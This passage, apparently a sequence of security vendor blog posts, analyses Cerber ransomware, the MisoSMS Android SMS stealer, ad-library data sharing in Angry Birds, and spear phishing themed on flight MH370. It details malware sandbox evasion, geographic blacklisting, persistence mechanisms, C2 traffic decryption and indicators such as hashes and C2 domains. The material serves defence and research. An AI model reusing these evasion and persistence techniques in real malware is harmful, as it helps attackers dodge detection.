Cerber targets 294 different file extensions for encryption, including .doc (typically Microsoft Word documents), .ppt (generally Microsoft PowerPoint slideshows), .jpg and other images. It also targets financial file formats such as .ibank (used with certain personal finance management software) and .wallet (used for Bitcoin).

Selective Targeting

Selective targeting was used in this campaign. The attackers were observed checking the country code of a host machine’s public IP address against a list of blacklisted countries in the JSON configuration, utilizing online services to verify the information. Blacklisted (protected) countries include: Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.

The attack also checked the system’s keyboard layout to further ensure it avoided infecting machines in the attackers’ geography: 1049—Russian, 1058—Ukrainian, 1059—Belarusian, 1064—Tajik, 1067—Armenian, 1068—Azeri (Latin), 1079—Georgian, 1087—Kazakh, 1088—Kyrgyz (Cyrillic), 1090—Turkmen, 1091—Uzbek (Latin), 2072—Romanian (Moldova), 2073—Russian (Moldova), 2092—Azeri (Cyrillic), 2115—Uzbek (Cyrillic).
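
The layout check is simple to reproduce. The sketch below encodes the layout identifiers listed above; the decision logic is an assumption based on the observed behavior, not code reversed from a Cerber sample:

```python
# Keyboard-layout LCIDs Cerber avoids, per the list above.
BLACKLISTED_LAYOUTS = frozenset({
    1049, 1058, 1059, 1064, 1067, 1068, 1079, 1087,
    1088, 1090, 1091, 2072, 2073, 2092, 2115,
})

def would_cerber_skip(keyboard_lcid: int) -> bool:
    """True if the host's keyboard layout falls in the protected set."""
    return keyboard_lcid in BLACKLISTED_LAYOUTS
```

On a live Windows host the LCID would come from an API such as GetKeyboardLayout; here it is passed in directly so the logic can be examined in isolation.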

Selective targeting has historically been used to keep malware from infecting endpoints within the author’s geographical region, thus protecting them from the wrath of local authorities. The actor also controls their exposure using this technique. In this case, there is reason to suspect the attackers are based in Russia or the surrounding region.

Anti VM Checks

The malware searches for a series of hooked modules, specific filenames and paths, and known sandbox volume serial numbers, including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll, Frz_State, C:\popupkiller.exe, C:\stimulator.exe, C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40, 6CBBC508, 774E1682, 837F873E, 8B6F64BC.

Aside from the aforementioned checks and blacklisting, there is also a wait option built in where the payload will delay execution on an infected machine before it launches an encryption routine. This technique was likely implemented to further avoid detection within sandbox environments.


Once executed, Cerber deploys the following persistence techniques to make sure a system remains infected:

  • A registry key is added to launch the malware instead of the screensaver when the system becomes idle.
  • The “CommandProcessor” AutoRun key value is changed to point to the Cerber payload so that the malware is launched each time the Windows command interpreter, “cmd.exe”, is run.
  • A shortcut (.lnk) file is added to the startup folder. This file references the ransomware and Windows will execute the file immediately after the infected user logs in.
  • Common persistence methods such as run and runonce key are also used.
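
Responders can sweep an exported set of registry values for these footholds. The following is a minimal sketch over a simplified export format; the key paths shown are the usual locations for these mechanisms, and the payload filename is hypothetical:

```python
def find_persistence_iocs(registry_values: dict, payload_name: str) -> list:
    """Return registry value paths whose data references the payload."""
    needle = payload_name.lower()
    return [path for path, data in registry_values.items()
            if needle in data.lower()]

# Hypothetical export: screensaver, cmd.exe AutoRun, and Run-key values.
sample = {
    r"HKCU\Software\Microsoft\Command Processor\AutoRun":
        r"C:\Users\victim\AppData\Roaming\{GUID}\werfault.exe",
    r"HKCU\Control Panel\Desktop\SCRNSAVE.EXE":
        r"C:\Users\victim\AppData\Roaming\{GUID}\werfault.exe",
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater":
        r"C:\Windows\System32\notepad.exe",
}
```

Checking several persistence locations at once matters here precisely because Cerber configures multiple concurrent mechanisms; removing only one leaves the system infected.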

A Solid Defense

Mitigating ransomware malware has become a high priority for affected organizations because passive security technologies such as signature-based containment have proven ineffective.

Malware authors have demonstrated an ability to outpace most endpoint controls by compiling multiple variations of their malware with minor binary differences. By using alternative packers and compilers, authors are increasing the level of effort for researchers and reverse-engineers. Unfortunately, those efforts don’t scale.

Disabling support for macros in documents from the Internet and increasing user awareness are two ways to reduce the likelihood of infection. If you can, consider blocking connections to websites you haven’t explicitly whitelisted. However, these controls may not be sufficient to prevent all infections, or they may not be feasible for your organization.

FireEye Endpoint Security with Exploit Guard helps to detect exploits and techniques used by ransomware attacks (and other threat activity) during execution and provides analysts with greater visibility. This helps your security team conduct more detailed investigations of broader categories of threats. This information enables your organization to quickly stop threats and adapt defenses as needed.


Ransomware has become an increasingly common and effective attack affecting enterprises, impacting productivity and preventing users from accessing files and data.

Mitigating the threat of ransomware requires strong endpoint controls, and may include technologies that allow security personnel to quickly analyze multiple systems and correlate events to identify and respond to threats.

HX with Exploit Guard uses behavioral intelligence to accelerate this process, quickly analyzing endpoints within your enterprise and alerting your team so they can conduct an investigation and scope the compromise in real-time.

Traditional defenses don’t have the granular view required to do this, nor can they connect the dots between discrete individual processes that may be steps in an attack. That takes behavioral intelligence able to quickly analyze a wide array of processes and alert on them so analysts and security teams can conduct a complete investigation into what has transpired, or is transpiring. This can only be done if those professionals have the right tools and visibility into all endpoint activity to find every aspect of a threat and deal with it, all in real time. At FireEye, we also go a step further and contact the relevant authorities to bring down these types of campaigns.

Click here for more information about Exploit Guard technology.

APT28: A Window into Russia’s Cyber Espionage Operations?

The role of nation-state actors in cyber attacks was perhaps most widely revealed in February 2013 when Mandiant released the APT1 report, which detailed a professional cyber espionage group based in China. Today we release a new report: APT28: A Window Into Russia’s Cyber Espionage Operations?

This report focuses on a threat group that we have designated as APT28. While APT28’s malware is fairly well known in the cybersecurity community, our report details additional information exposing ongoing, focused operations that we believe indicate a government sponsor based in Moscow.

In contrast with the China-based threat actors that FireEye tracks, APT28 does not appear to conduct widespread intellectual property theft for economic gain. Instead, APT28 focuses on collecting intelligence that would be most useful to a government. Specifically, FireEye found that since at least 2007, APT28 has been targeting privileged information related to governments, militaries and security organizations that would likely benefit the Russian government.

In our report, we also describe several malware samples containing details that indicate that the developers are Russian language speakers operating during business hours that are consistent with the time zone of Russia’s major cities, including Moscow and St. Petersburg. FireEye analysts also found that APT28 has systematically evolved its malware since 2007, using flexible and lasting platforms indicative of plans for long-term use and sophisticated coding practices that suggest an interest in complicating reverse engineering efforts.

We assess that APT28 is most likely sponsored by the Russian government based on numerous factors summarized below:

Table for APT28

FireEye is also releasing indicators to help organizations detect APT28 activity. Those indicators can be downloaded at

As with the APT1 report, we recognize that no single entity completely understands the entire complex picture of intense cyber espionage over many years. Our goal in releasing this report is to offer an assessment that informs and educates the community about attacks originating from Russia. The complete report can be downloaded here: /content/dam/legacy/resources/pdfs/apt28.pdf.

Android.MisoSMS: It’s Back! Now With XTEA


FireEye Labs recently found a more advanced variant of Android.MisoSMS, the SMS-stealing malware that we uncovered last December — yet another sign of cybercriminals’ growing interest in hijacking mobile devices for surveillance and data theft.

Like the original version of the malware, the new variant sends copies of users’ text messages to servers in China. But the newest rendition adds a few features that make it harder to detect, including a new disguise, encrypted transmissions, and command-and-control (CnC) communications that are handled natively rather than over email.

FireEye Mobile Threat Prevention customers are already protected from both variants.


Both variants of MisoSMS use the same names for receivers and services. While the old variant masquerades as an Android settings application, the new version presents itself as “Gplay Dsc” to the user.

The new variant also abandons SMTP email as the transport method. It now handles all CnC communication natively in C++, making it harder for an analyst to analyze the malware by disassembling its ARM code.

The newer version also hard codes specific public DNS servers such as the following:


The new MisoSMS attempts to resolve its CnC domain name (puk[dot]nespigt[dot]iego[dot]net) from one of these DNS servers. In this way, MisoSMS stays quiet in sandbox environments, which typically use internal DNS servers and cut off access to outside networks. If the malware cannot reach the hard-coded DNS servers, it does nothing, and is therefore not detected.

The new MisoSMS also uses a variant of the XTEA encryption algorithm to communicate with its CnC server. Requests to and responses from the CnC server are structured so that the first four bytes contain the length of the encrypted blob of data. By skipping the first four bytes, we can decrypt the communications using the key embedded in the native binary.
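
To illustrate that framing, here is a hedged sketch pairing standard 32-round XTEA with a 4-byte big-endian length prefix. The byte order, round count, and key are assumptions for illustration; MisoSMS’s exact parameters and key must be recovered from the native binary, and the malware uses a variant of XTEA rather than the textbook algorithm shown here.

```python
import struct

DELTA, MASK = 0x9E3779B9, 0xFFFFFFFF

def xtea_encrypt_block(block: bytes, key) -> bytes:
    """Standard XTEA encipher of one 8-byte block (key = four 32-bit words)."""
    v0, v1 = struct.unpack(">2I", block)
    s = 0
    for _ in range(32):
        v0 = (v0 + ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + key[s & 3]))) & MASK
        s = (s + DELTA) & MASK
        v1 = (v1 + ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + key[(s >> 11) & 3]))) & MASK
    return struct.pack(">2I", v0, v1)

def xtea_decrypt_block(block: bytes, key) -> bytes:
    """Inverse of xtea_encrypt_block."""
    v0, v1 = struct.unpack(">2I", block)
    s = (DELTA * 32) & MASK
    for _ in range(32):
        v1 = (v1 - ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + key[(s >> 11) & 3]))) & MASK
        s = (s - DELTA) & MASK
        v0 = (v0 - ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + key[s & 3]))) & MASK
    return struct.pack(">2I", v0, v1)

def decode_c2_message(buf: bytes, key) -> bytes:
    """Strip the 4-byte length prefix, then decrypt the 8-byte blocks."""
    (length,) = struct.unpack(">I", buf[:4])
    blob = buf[4:4 + length]
    return b"".join(xtea_decrypt_block(blob[i:i + 8], key)
                    for i in range(0, len(blob), 8))
```

With the real key pulled from the binary, the same decode routine can be run over captured PCAP payloads to recover the registration and SMS-exfiltration messages shown in the figures below.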

Figure 1 shows MisoSMS registering a newly infected device with the CnC server. The first four bytes in the encrypted payload mark the length of the message. The rest of the payload contains information about the infected device.

[caption id="attachment_5080" align="aligncenter" width="621"]New infection registration to the CnC Server Figure 1 - New Infection Registration[/caption]

Figure 2 and Figure 3 show the SMS exfiltration mechanism. As in Figure 1, the first four bytes of the encrypted payload contain the length of the payload. The intercepted SMS message is sent to the CnC along with the device ID of the already compromised device.

[caption id="attachment_5078" align="aligncenter" width="640"]Encrypted CnC Communication containing stolen SMS Figure 2 - Encrypted CnC Communication containing stolen SMS[/caption]

[caption id="attachment_5079" align="aligncenter" width="640"]Decrypted CnC Communication containing stolen SMS Figure 3 - Decrypted CnC Communication containing stolen SMS[/caption]

The domain name of the CnC is also encrypted and stored as a byte array in the native binary. Once the encrypted byte array containing the CnC information is decrypted, the malware checks to see whether the CnC is a domain or an IP address.

That check is meaningful. Its existence implies the ability to change the CnC information dynamically, and that ability, in turn, suggests that MisoSMS uses excerpts of publicly available code.

The CnC server currently serves a Web page that resembles an Android app, as shown in Figure 4.

[caption id="attachment_5081" align="aligncenter" width="349"]CnC serving a Web page Figure 4 - CnC serving a Web page[/caption]

The Web page contains a link pointing to “hxxps://[dot]apk,” which is currently not available. Like the website, the MisoSMS app itself displays Korean text.

The newest version of MisoSMS suggests that cyber attackers are increasingly eyeing mobile devices — and the valuable information they store — as targets. It also serves as a vivid reminder of how crucial protecting this threat vector is in today’s mobile environment.

A Little Bird Told Me: Personal Information Sharing in Angry Birds and its Ad Libraries

Many popular mobile apps, including Rovio’s ubiquitous Angry Birds, collect and share players’ personal information much more widely than most people realize.

Some news reports have begun to scratch the surface of the situation. The New York Times reported on Angry Birds and other data-hungry apps last October. And in January, the newspaper teamed up with public-interest news site ProPublica and U.K. newspaper the Guardian for a series of stories detailing how government agencies use the game (and other mobile apps) to collect personal data. Even the long-running CBS show 60 Minutes reported earlier this month that Rovio shares users’ locations.

The Android version of Angry Birds in the Google Play store, updated on March 4, continues to share personal information. In fact, more than a quarter billion users who create Rovio accounts to save their game progress across multiple devices might be unwittingly sharing all kinds of information—age, gender, and more — with multiple parties. And many more users who play the game without a Rovio account are sharing their device information without realizing it.

Once a Rovio account is created and personal information uploaded, the user can do little to stop this sharing. The data might reside in multiple locations: Angry Birds Cloud, Burstly (an ad mediation platform), and third-party ad networks such as Jumptap and Millennial Media. Users can avoid sharing personal data by playing Angry Birds without a Rovio account, but that won’t stop the game from sharing device information.

In this blog post, we examine the personal information Angry Birds collects. We also demonstrate the relationships between the app, the ad mediation platform, and the ad clouds — showing how the information flows among the three. We also spell out the evidence, such as network packet capture (PCap) from FireEye Mobile Threat Prevention (MTP), to support our information flow chart. Finally, we reveal how the multi-stage information sharing works by tracking the code paths from the reverse-engineered source code.

To investigate the mechanism and contents of the information sharing, we researched different versions of Angry Birds. We found that multiple versions of the game can share personal information in clear text, including email, address, age, and gender.

Angry Birds’ data management service shares information in the penultimate version of the game (v4.0.0), which was offered in the Google Play store through March 4. And contrary to media reports that this data sharing occurred only in an older “special edition” of the game, we found that some sharing occurs in multiple versions of Angry Birds — including the latest “classic” version, 4.1.0 (this update was added to Google Play on March 4). With more than 2 billion downloads of Angry Birds so far, this sharing affects many, many devices.

What information is shared?

Angry Birds encourages players to create Rovio accounts, touting the following benefits:

  • To save scores and in-game weapons
  • To preserve game progress across multiple devices

The second benefit is especially attractive to devoted Angry Birds players because it allows them to stop playing on one device and pick up where they left off on another. Figure 1 shows the Rovio registration page.


    [caption id="attachment_4889" align="aligncenter" width="546"]Figure 1. The registration page of the Rovio account. Figure 1: Rovio’s registration page[/caption]

    Figure 2 shows birthday information collected during registration. The end-user license agreement (EULA) and privacy policy grant Rovio rights to upload the collected information to third-party entities for marketing.

    Figure 2: The registration of the Rovio account includes personal information and the EULA.

    In Figure 3, the registration page asks for the user’s email address and gender.  When the player clicks the register button, Rovio uploads the collected data to the Angry Birds Cloud to create a player profile.

    Figure 3: Rovio asks for email and gender information during registration.

    Figure 4 shows another way Angry Birds collects personal information.  Rovio offers a newsletter to update Angry Birds players with new games, episodes, and special offers.  During newsletter signup, Rovio collects the player’s first and last name, email address, date of birth, country of residence, and gender. This information is aggregated with the user’s Rovio account profile by matching the player’s email address.

    Figure 4: Newsletter registration page requesting more personal information
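The aggregation described above is effectively a join keyed on the email address. A minimal sketch (the field names and sample values are hypothetical; Rovio's actual schema is not documented in this post):

```python
def merge_profiles(account_profiles, newsletter_signups):
    """Join newsletter data onto account profiles by email address.

    Both inputs are lists of dicts containing an "email" key
    (hypothetical schema, for illustration only).
    """
    by_email = {p["email"]: dict(p) for p in account_profiles}
    for signup in newsletter_signups:
        profile = by_email.setdefault(signup["email"], {"email": signup["email"]})
        # Newsletter fields (name, birthday, country, gender) enrich the profile.
        for key, value in signup.items():
            profile.setdefault(key, value)
    return by_email

accounts = [{"email": "player@example.com", "gender": "FEMALE"}]
signups = [{"email": "player@example.com", "country": "US", "birthday": "19XX-XX-01"}]
merged = merge_profiles(accounts, signups)
```

Once two data sets share a stable key like an email address, combining them requires no cooperation from the user.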

    Figure 5: Information flow among Angry Birds, the ad mediation platform, and the ad clouds

    First, we are concerned with the type of information transmitted to the advertisement library. Figure 5 illustrates the information flow among Angry Birds, the Angry Birds Cloud, Burstly (the embedded ad library and ad mediation platform), and cloud-based ad services such as Jumptap and Millennial Media.

    Angry Birds uses Burstly as an ad adapter, which provides integration with numerous third-party ad clouds including Jumptap and Millennial Media. The ad services use players’ personal data to target ads.

    As the figure shows, Angry Birds maintains an HTTP connection with the advertising platform Burstly, the advertisement provider Millennial Media, and more.

    Traffic flow

    Table 1 summarizes the connections, which we explain in detail below.

    PCap  Request
    1     POST (personal information, IP) to Burstly (ad mediation platform)
    2     GET ad from Jumptap (third-party ad cloud)
    3     GET ad from a further third-party ad cloud

    Table 1: PCap information exchanged between Angry Birds, Burstly and third-party ad clouds

    Angry Birds uses native code to access storage, helping the ad libraries store logs, caches, databases, configuration files, and AES-encrypted game data. For users with a Rovio account, this data includes the user's personal information in clear text or easily decrypted formats. For example, some information is stored in clear text in the web view cache called webviewCacheChromium:

    {"accountId":"AC3XXX...XXXA62B","accountExtRef":"hE...fDc","personal":{"firstName":null,"lastName":null,"birthday":"19XXXXX-01", "age":"30", "gender":"FEMALE", "country":"United States" , "countryCode":"US", "marketingConsent":false, "avatarId":"AVXXX...XXX2c","imageAssets":[...], "nickName":null}, "abid":{"email":"eXXX...XXXe@XXX.XXX", "isConfirmed":false}, "phoneNumber":null, "facebook":{"facebookId":"","email":""},"socialNetworks":[]}
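Because the cached record is ordinary JSON, anything that can read the cache file can recover the fields directly. A sketch using a simplified, redacted version of the record above:

```python
import json

# Simplified, redacted version of the webviewCacheChromium record shown above.
cached = ('{"accountId":"AC3XXXA62B",'
          '"personal":{"age":"30","gender":"FEMALE","country":"United States"},'
          '"abid":{"email":"eXXXe@XXX.XXX","isConfirmed":false}}')

record = json.loads(cached)
personal = record["personal"]
print(personal["age"], personal["gender"], record["abid"]["email"])
```

No decryption step is needed for these fields; possession of the cache file is enough.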

    The device is given a universal id 1XXXX8, which is stored in the webviewCookiesChromium database in clear text:


    The id "1XXXX8" labels the personal information when uploaded by the ad mediation platform. Then the information is passed to ad clouds.

    1. The initial traffic capture in the PCap shows what kind of information Angry Birds uploads to Burstly:

    HTTP/1.1 200 OK

    Cache-Control: private

    Date: Thu, 06 Mar 2014 XX:XX:XX GMT

    Server: Microsoft-IIS/7.5

    ServerName: P-ADS-OR-WEBC #22

    X-AspNet-Version: 4.0.30319

    X-Powered-By: ASP.NET

    X-ReqTime: 0

    Content-Length: 0

    Connection: keep-alive

    POST /Services/PubAd.svc/GetSingleAdPlacement HTTP/1.1

    Content-type: text/json; charset=utf-8

    User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; Ascend Y300 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

    Content-Length: 1690


    Connection: Keep-Alive

    {"data":{"Id":"8XXX5","acceptLanguage":"en","adPool":0,"androidId":"u1XXX...XXXug","bundleId": "com.rovio.angrybirds",…,"cookie":[{"name":"cu1XXX8","value":"3XXX6+PM"},{"name":"vw","value":"ref=1XXX2&dgi=,eL,default,GFW"},{"name":"lc","value":"1XXX8"},{"name":"iuXXXg","value":"x"},{"name":"cuXXX8","value":"3%2XXXPM"},{"name":"fXXXg","value":"ref=1XXX712&crXXX8=2,1&crXXX8=,1"}], "crParms":"age=30,androidstore='', customer='googleplay', gender='FEMALE', version='4.1.0'", "debugFlags":0, "deviceId":"aXXX...XXXd", "encDevId":"xXXX....XXXs=", "encMAC":"iXXX...XXXg=", "ipAddress":"","mac":"1XXX...XXX9", "noTrack":0,"placement":"", "pubTargeting":"age=30, androidstore='', customer='googleplay', gender='FEMALE', version='4.1.0'","rvCR":"", "type":"iq","userAgentInfo":{"Build":"", "BuildID":"323", "Carrier":"","Density":"High", "Device":"AscendY300", "DeviceFamily":"Huawei", "MCC":"0","MNC":"0",...

    We can see the transmitted information includes gender, age, Android ID, device ID, MAC address, device type, etc. In another PCap, in which Angry Birds sends a POST to the same host name, the IP address is transmitted too:

    HTTP/1.1 200 OK

    POST /Services/v1/SdkConfiguration/Get HTTP/1.1




    According to whois records, the registrant organization of the domain is Burstly, Inc. Therefore, the aforementioned information is actually transmitted to Burstly. Both PCaps contain the keyword “crParms.” This keyword is also used in the source code to put personal information into a map sent as a payload. The host belongs to an app monetization service provided by Burstly. The following PCap shows that Angry Birds retrieves the customer ID through an HTTP GET request:

    HTTP/1.1 200 OK

    Cache-Control: private

    Content-Type: text/html

    Date: Thu, 06 Mar 2014 07:12:25 GMT

    Server: Microsoft-IIS/7.5

    ServerName: P-ADS-OR-WEBA #5

    X-AspNet-Version: 4.0.30319

    X-Powered-By: ASP.NET

    X-ReqTime: 2

    X-Stats: geo-0

    Content-Length: 9606

    Connection: keep-alive

    GET /7….4/ad/image/1...c.jpg HTTP/1.1

    User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; Ascend Y300 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30


    Connection: Keep-Alive

    {"type":"ip","Id":"9XXX8",..."data":[{"imageUrl":"","adType":{"width":300, "height":250, "extendedProperty":80}, "dataType": 64, "textAdType":0,"destType":1,"destParms":"","cookie":[{"name":"fXXXg", "value": "ref=1XXX2&cr1XXX8=2,1&cr1XXX8=1&aoXXX8=", "path":"/", "domain": "", "expires":"Sat, 05 Apr 2014 XXX GMT", "maxage": 2…0}, {"name":"vw","value":"ref=1XXX2&...},...,"cbi":"","cbia":["http://bs….":1,"expires":60},..."color":{"bg":"0…0"}, "isInterstitial":1}

    2. In this PCap, the ad is fetched by including the customer id 1XXX8 in the HTTP POST request to Millennial Media:

    HTTP/1.1 200 OK

    Cache-Control: private

    Content-Type: text/html

    Date: Thu, XX Mar 2014 XX:XX:XX GMT

    Server: Microsoft-IIS/7.5

    ServerName: P-ADS-OR-WEBC #17

    X-AspNet-Version: 4.0.30319

    X-Powered-By: ASP.NET

    X-ReqTime: 475

    X-Stats: geo-0;rcf88626-255;rcf75152-218

    Content-Length: 2537

    Connection: keep-alive

    GET /img/1547/1XXX2.jpg HTTP/1.1


    Connection: keep-alive

    Referer: http://bar/

    X-Requested-With: com.rovio.angrybirds

    User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; Ascend Y300 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

    Accept-Encoding: gzip,deflate

    Accept-Language: en-US

    Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7

    {"type":"ip","Id":"8XXX5","width":320,"height":50,"cookie":[],"data":[{"data":"<!-- AdPlacement : banner_ingame_burstly…","adType":{"width":320, "height":50, "extendedProperty":2064 },"dataType":1, "textAdType":0, "destType":10, "destParms":"", "cookie":[{"name":"...", "value":"ref=...&cr1XXX8=4,1&cr1XXX8=2,1", "path":"/", "domain":"", "expires":"Sat, 0X Apr 2014 0X:XX:XX GMT", "maxage":2XXX0}, {"name":"vw",..., "crid":7XXX2, "aoid":3XXX3, "iTrkData":"...", "clkData":"...","feedName":"Nexage"}]}

    In this PCap, the advertisement is retrieved from the ad cloud. We can use the same customer id “1XXXX8” to easily track the PCaps of different ad libraries.
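Pivoting on the customer ID is as simple as searching each capture's request bodies for the same token. A sketch over hypothetical, simplified request bodies (real captures are binary and would be parsed with a pcap library):

```python
# Hypothetical, simplified request bodies standing in for the PCaps above.
captures = {
    "burstly":    '{"Id":"8XXX5","cookie":[{"name":"lc","value":"1XXXX8"}]}',
    "millennial": '{"Id":"8XXX5","cookie":[{"name":"fXXXg","value":"ref=1XXXX8"}]}',
    "other":      '{"Id":"0...b","cookie":[]}',
}

customer_id = "1XXXX8"
# Captures that carry the same customer ID belong to the same tracked device.
linked = [name for name, body in captures.items() if customer_id in body]
```

A stable identifier reused across ad networks is exactly what makes cross-service tracking of one device possible.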

    3. For example, in another PCap, the customer id remains the same:

    HTTP/1.1 200 OK

    Cache-Control: private

    Content-Type: text/html

    Date: Thu, 06 Mar 2014 07:30:54 GMT

    Server: Microsoft-IIS/7.5

    ServerName: P-ADS-OR-WEBB #6

    X-AspNet-Version: 4.0.30319

    X-Powered-By: ASP.NET

    X-ReqTime: 273

    X-Stats: geo-0;rcf88626-272

    Content-Length: 4714

    Connection: keep-alive

    GET /server/ads.js?pub=24…

    PvctPFq&acp=0.51 HTTP/1.1


    Connection: keep-alive

    Referer: http://bar/

    Accept: */*

    X-Requested-With: com.rovio.angrybirds

    User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; Ascend Y300 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

    Accept-Encoding: gzip,deflate

    Accept-Language: en-US

    Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7

    {"type":"ip","Id":"0...b","width":320,"height":50,"cookie":[],"data":[{"data":"<!-- AdPlacement : banner_ingame_burstly --> \"" destParms":"", "cookie":[{"name":"f...g", "value":"ref=1...0&cr1XXXX8=k,1&cr...8=i, 1","path":"/", "domain":"", "expires":"Sat, 0X Apr 2014 0X:XX:XX

    How is the personal information shared?

    We also researched the source code of Burstly (the ad mediation platform) to trace the method calls behind the information sharing. First, in com/burstly/lib/conveniencelayer/BurstlyAnimated, when Angry Birds tries to initialize the connection with Burstly, initNewAnimatedBanner() is called as follows:

    this.initNewAnimatedBanner (arg7.getActivity(), arg8, arg9, arg10, arg11);

    Inside initNewAnimatedBanner(), it instantiates the BurstlyView object by calling:

    BurstlyView v0 = new BurstlyView(((Context)arg3));


    Before the ZoneId is set, the initializeView() method is called in the constructor of BurstlyView. Furthermore, inside the initializeView() method, we found the following:

    new BurstlyViewConfigurator(this).configure(this.mAttributes);

    Finally in the BurstlyViewConfigurator.configure() method, it sets a series of parameters:








    These method calls retrieve information from the view’s attributes. For example, the extractAndApplyCrParams() method retrieves parameters and stores them in the BurstlyView object:

    String v0 = this.mAttributes.getAttributeValue("", "crParams");

    if(v0 != null) {

        BurstlyViewConfigurator.LOG.logDebug("BurstlyViewConfigurator", "Setting CR params to: {0}", new Object[]{v0});

        // the retrieved value is then applied to the BurstlyView (call elided)
    }

    The key crParms is the same one used in the first PCap to label the values corresponding to personal information such as age and gender.
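The crParms value is a flat comma-separated key/value string, so recovering the personal information from a capture is trivial. A minimal parsing sketch using the values shown in the first PCap:

```python
def parse_cr_parms(raw):
    """Split a crParms string like the one in the first PCap into a dict."""
    result = {}
    for pair in raw.split(","):
        key, _, value = pair.strip().partition("=")
        result[key] = value.strip("'")   # values may be quoted, e.g. gender='FEMALE'
    return result

parms = parse_cr_parms("age=30,androidstore='', customer='googleplay', "
                       "gender='FEMALE', version='4.1.0'")
```

The same one-line-of-parsing simplicity applies to anyone intercepting the traffic, not just the intended ad cloud.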


    In summary, Angry Birds collects the user’s personal information and associates it with a customer id before storing it in the smartphone’s storage. The Burstly ad library embedded in Angry Birds then fetches the customer id, uploads the corresponding personal information to the Burstly cloud, and transmits it to other advertising clouds. We captured this traffic in network packet captures and traced the corresponding code paths in the reverse-engineered source code.

    For FireEye ThreatScore information on Angry Birds and more details about the application’s behavior, FireEye Mobile Threat Prevention customers can access their Mobile Threat Prevention (MTP) portal.


Spear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370

While many advanced persistent threat (APT) groups have increasingly embraced strategic Web compromise as a malware delivery vector, groups also continue to rely on spear-phishing emails that leverage popular news stories. The recent tragic disappearance of flight MH 370 is no exception. This post will examine multiple instances from different threat groups, all using spear-phishing messages and leveraging the disappearance of Flight 370 as a lure to convince the target to open a malicious attachment.

“Admin@338” Targets an APAC Government and U.S. Think Tank

The first spear phish from group “Admin@338” was sent to a foreign government in the Asian Pacific region on March 10, 2014 – just two days after the flight disappeared. The threat actors sent a spear-phishing email with an attachment titled, “Malaysian Airlines MH370.doc” (MD5: 9c43a26fe4538a373b7f5921055ddeae). Although threat actors often include some sort of “decoy content” upon successful exploitation (that is, a document representing what the recipient expected to open), in this case, the user is simply shown a blank document.

The attachment dropped a Poison Ivy variant into the path C:\DOCUME~1\admin\LOCALS~1\Temp\kav.exe (MD5: 9dbe491b7d614251e75fb19e8b1b0d0d), which, in turn, beaconed outbound to www.verizon.proxydns[.]com. This Poison Ivy variant was configured with the connection password “wwwst@Admin.” The APT group we refer to as Admin@338 has previously used Poison Ivy implants with this same password. We document the Admin@338 group’s activities in our Poison Ivy: Assessing Damage and Extracting Intelligence paper. Further, the domain www.verizon.proxydns[.]com previously resolved to the following IP addresses that have also been used by the Admin@338 group:

IP Address    First Seen    Last Seen
…             2013-08-27    2013-08-27
…             2013-08-28    2013-08-28
…             2013-08-28    2013-08-28
…             2013-08-31    2013-08-31
…             2013-09-03    2013-09-03
…             2014-03-07    2014-03-07
…             2014-03-07    2014-03-07
…             2014-03-19    2014-03-19

A second targeted attack attributed to the same Admin@338 group was sent to a prominent U.S.-based think tank on March 14, 2014. This spear phish contained an attachment that dropped “Malaysian Airlines MH370 5m Video.exe” (MD5: b869dc959daac3458b6a81bc006e5b97). The malware sample was crafted to appear as though it was a Flash video, by binding a Flash icon to the malicious executable.


Interestingly, in this case, the malware sets its persistence in the normal “Run” registry location, but it tries to auto-start the payload from the disk directory “c:\programdata”, which does not exist before Windows Vista, so a simple reboot would mitigate this threat on Windows XP. This suggests the threat actors did not perform quality control on the malware or were simply careless. We detect this implant as Backdoor.APT.WinHTTPHelper. The Admin@338 group discussed above has used variants of this same malware family in previous targeted attacks.
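Why the persistence fails on XP can be illustrated with a small sketch: the autostart entry points into a directory that simply is not present on the older OS. All names and directory sets here are hypothetical, for illustration only:

```python
import ntpath

def autorun_survives_reboot(run_value, existing_dirs):
    """Return True if a Run-key command points into a directory that
    exists on the given system (hypothetical helper)."""
    directory = ntpath.dirname(run_value.strip('"')).lower()
    return directory in existing_dirs

# Directory sets standing in for the two OS generations discussed above.
xp_dirs = {r"c:\documents and settings\all users\application data"}
vista_and_later_dirs = xp_dirs | {r"c:\programdata"}

payload = r"c:\programdata\svchost.exe"   # hypothetical payload path
```

On XP the Run key survives the reboot, but the file it points to was never written to a valid location, so nothing launches.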

This specific implant beacons out to dpmc.dynssl[.]com:443 and www.dpmc.dynssl[.]com:80. The domain dpmc.dynssl[.]com resolved to the following IPs:

IP Address    First Seen    Last Seen
…             2013-11-01    2013-11-01
…             2013-11-29    2013-11-29
…             2014-01-10    2014-01-10
…             2014-03-08    2014-03-08
…             2014-03-14    2014-03-14
…             2014-03-17    2014-03-17
…             2014-03-17    2014-03-17
…             2014-03-19    2014-03-19

The www.dpmc.dynssl[.]com domain resolved to following IPs:

IP Address    First Seen    Last Seen
…             2013-10-30    2013-10-30
…             2013-11-29    2013-11-29
…             2014-01-10    2014-01-10
…             2014-03-08    2014-03-08
…             2014-03-14    2014-03-14
…             2014-03-18    2014-03-18
…             2014-03-17    2014-03-17
…             2014-03-19    2014-03-19

